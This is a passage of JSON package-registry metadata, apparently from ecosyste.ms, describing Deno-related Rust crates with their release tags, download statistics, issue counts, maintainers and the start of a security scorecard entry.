:"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T22:23:54.735Z","dependent_packages_count":1,"downloads":36136,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":59.291808326383986,"dependent_repos_count":29.318292202377133,"dependent_packages_count":16.95609541526534,"stargazers_count":0.028408309888841035,"forks_count":0.08705772385289993,"average":21.13633239555364},"purl":"pkg:cargo/deno_snapshots","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_snapshots","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_snapshots","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_snapshots/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-03-03T20:26:13.884Z","updated_at":"2025-03-03T20:26:13.884Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-01-19T09:43:13.989Z","updated_at":"2025-01-19T09:43:13.989Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4198030,"name":"node_resolver","ecosystem":"cargo","description":"Node.js module resolution algorithm used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":96,"first_release_published_at":"2022-02-24T04:50:07.013Z","latest_release_published_at":"2026-08-06T11:33:31.964Z","latest_release_number":"0.95.0","last_synced_at":"2026-08-29T21:57:54.107Z","created_at":"2022-04-12T20:23:23.291Z","updated_at":"2026-08-29T21:57:54.107Z","registry_url":"https://crates.io/crates/node_resolver/","install_command":"cargo install node_resolver","documentation_url":"https://docs.rs/node_resolver/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are 